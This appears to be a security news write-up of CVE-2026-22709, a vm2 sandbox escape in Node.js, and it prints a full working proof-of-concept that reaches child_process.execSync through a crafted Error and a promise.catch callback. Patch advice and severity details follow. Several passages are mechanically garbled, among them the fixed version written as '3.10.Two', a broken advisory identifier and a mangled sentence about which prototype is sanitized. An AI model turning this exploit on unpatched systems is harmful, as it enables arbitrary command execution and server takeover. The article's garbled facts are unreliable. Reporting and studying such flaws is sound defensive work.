The well-known Node.js sandboxing library vm2 has a serious flaw that lets attackers get out of the sandbox and run arbitrary system commands on the host This article explores guarantees vm2 sandbox. . VM2 versions up to and including 3.10.0 are affected by the problem, which is tracked as CVE-2026-22709 and is resolved in version 3.10.Two.

In an advisory, GHSA-99p7-6v5w-7xg,8, security researcher Patriksimek explained how Promise callback sanitization in VM2 can be circumvented, allowing untrusted sandboxed code to run as full host code. How the Exploit Operates Inconsistent sanitization of Promise callbacks within the sandbox is the root of the vulnerability. Only the localPromise callback function is present in lib/setup-sandbox.js.prototype, after which it is cleaned. GlobalPromise.prototype.then is not cleaned, though.

Because the return value of async functions is a global Promise object, attackers can abuse this gap to run arbitrary code outside the intended sandbox restrictions. The provided proof-of-concept (PoC) demonstrates the impact clearly: jsconst { VM } = require("vm2"); const code = ` const error = new Error(); error.name = Symbol(); const f = async () => error.stack; const promise = f(); promise.catch(e => { const Error = e.constructor; const Function = Error.constructor; const f = new Function( "process.mainModule.require('child_process').execSync('echo HELLO WORLD! ', { stdio: 'inherit' })" ); f(); }); `; new VM().run(code); In this exploit, the attacker uses a crafted Error object, an async function, and a promise.catch callback to reach the Function constructor and then call child_process.execSync.

This permits arbitrary command execution on the underlying system and totally violates the isolation guarantees of the VM2 sandbox. Field Information CVE ID CVE-2026-22709 Package vm2 (npm) is impacted. Versions Affected <= 3.10.0 The following CVSS v3 gives the vulnerability a Critical rating.One vector CVSS CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H This illustrates how attacks can be initiated remotely over a network, don't require user interaction or privileges, and can completely compromise availability, confidentiality, and integrity.

Any application that executes user-supplied or untrusted code using VM2 is highly vulnerable. A successful exploit enables an attacker to execute system commands with the Node.js process's permissions, which could result in data theft, lateral movement, or complete server takeover. VM2 versions ≤ 3.10.0 are all susceptible.

VM2 version 3.10.2 resolves the problem. On any unpatched instance exposed to untrusted input, developers should assume that sandbox escape is possible and upgrade to 3.10.2 or later right away. Patching should be given top priority by administrators and developers who depend on VM2 for isolation, and logs should be examined for questionable sandboxed code activity.